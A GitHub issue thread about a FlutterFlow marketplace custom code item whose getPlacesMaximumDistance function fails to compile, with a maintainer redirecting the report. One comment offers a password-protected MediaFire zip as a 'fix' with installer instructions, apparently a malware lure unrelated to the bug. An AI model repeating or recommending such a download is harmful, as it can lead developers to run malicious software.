### ISSUE TITLE
Filter and Sort by Distance Custom Code In Market Place Contains Errors

### ISSUE THREAD

**Issue by chooito** [FlutterFlow/flutterflow-issues#3706]
### Can we access your project?

- [X] I give permission for members of the FlutterFlow team to access and test my project for the sole purpose of investigating this issue.

### Current Behavior

Importing the marketplace custom code item produces errors "Filter and Sort by Distance" by Middnight
Function has invalid return type. Function name: getPlacesMaximumDistance

### Expected Behavior

Custom code imported from the marketplace should not contain errors 

### Steps to Reproduce

1. Create A New Project
2. Go to Marketplace and import the Custom Code item "Filter and Sort by Distance" by Middnight. 
3. The code has the following error and won't compile: Function has invalid return type. Function name: getPlacesMaximumDistance

### Reproducible from Blank

- [X] The steps to reproduce above start from a blank project.

### Bug Report Code (Required)

IT4gls/l6otPm9tH1s7yKe9Wr2UsHDM/bb00sNobbxAjIoDoPJkUaeD4UBJoXby8SmxHKEWKimo0p+j8udr1Ue4DOTGWfphRyM9+UwziJUO/aoSQCpOwX2t5L+ZmGX6a0rbQ3CNAVc1fc3tl2E2QGe6AbA7qQ737Zwh9f6PHaOI=

### Visual documentation

![ErrorsDetected](https://github.com/user-attachments/assets/c50f8ecf-e85c-4652-bbac-f11b5b327017)

### Environment

```markdown
- FlutterFlow version: 4.1.85
- Platform:All
- Browser name and version: Brave: Version 1.69.153 Chromium: 128.0.6613.85 (Official Build) (64-bit)
- Operating system and version affected: Windows 10
```

### Additional Information

I want to use the function "as is" in my project

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alezanello** [comment]
Hello!!<br><br>Most of Marketplace items are made by other users, this Github Issue Tracker is intended to replicate bugs created directly in FlutterFlow from a new Blank Project, in this case please go to the marketplace and report the item directly.

<img src="https://uploads.linear.app/3241089d-736a-4422-900b-051e72accdbe/dddd27b5-05a8-41e9-afe4-66aff8a40690/3fa1e322-3635-4494-b15c-10e955c46119?signature=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwYXRoIjoiLzMyNDEwODlkLTczNmEtNDQyMi05MDBiLTA1MWU3MmFjY2RiZS9kZGRkMjdiNS0wNWE4LTQxZTktYWZlNC02NmFmZjhhNDA2OTAvM2ZhMWUzMjItMzYzNS00NDk0LWIxNWMtMTBlOTU1YzQ2MTE5IiwiaWF0IjoxNzI0OTUzNzgzLCJleHAiOjMzMjk1NTEzNzgzfQ.a2OFmwskswXo2yE55A4sR9LB0E5ihmeSZRJjcbCXmfw " alt="image.png" width="1005" height="315" />
